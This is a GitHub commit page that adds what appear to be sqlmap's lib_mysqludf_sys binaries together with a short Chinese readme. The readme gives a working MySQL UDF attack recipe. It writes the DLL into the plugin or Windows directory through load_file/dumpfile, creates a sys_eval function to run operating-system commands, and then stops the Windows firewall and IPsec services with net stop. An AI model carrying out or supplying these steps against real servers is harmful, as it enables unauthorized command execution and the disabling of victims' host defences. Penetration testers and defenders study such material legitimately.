Skip to content

Commit 9af6ad4

Browse files
committed
sqlmap udf
sqlmap udf
1 parent ec5b469 commit 9af6ad4

File tree

3 files changed

+14
-0
lines changed

3 files changed

+14
-0
lines changed
Binary file not shown.
Binary file not shown.

sqlmap lib_mysqludf_sys/readme.txt

+14
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,14 @@
1+
sqlmap udf
2+
3+
首先导入dll,根据版本导入到windows或mysql 插件目录(select @@plugin_dir):
4+
select load_file('D:/RECYCLER/lib_mysqludf_sys.dll') into dumpfile'c:/windows/lib_mysqludf_sys.dll'
5+
6+
创建function:
7+
create function sys_eval returns string soname 'lib_mysqludf_sys.dll';
8+
9+
执行命令:
10+
select sys_eval('whoami')
11+
12+
停止windows防火墙和筛选
13+
net stop policyagent
14+
net stop sharedaccess

0 commit comments

Comments
 (0)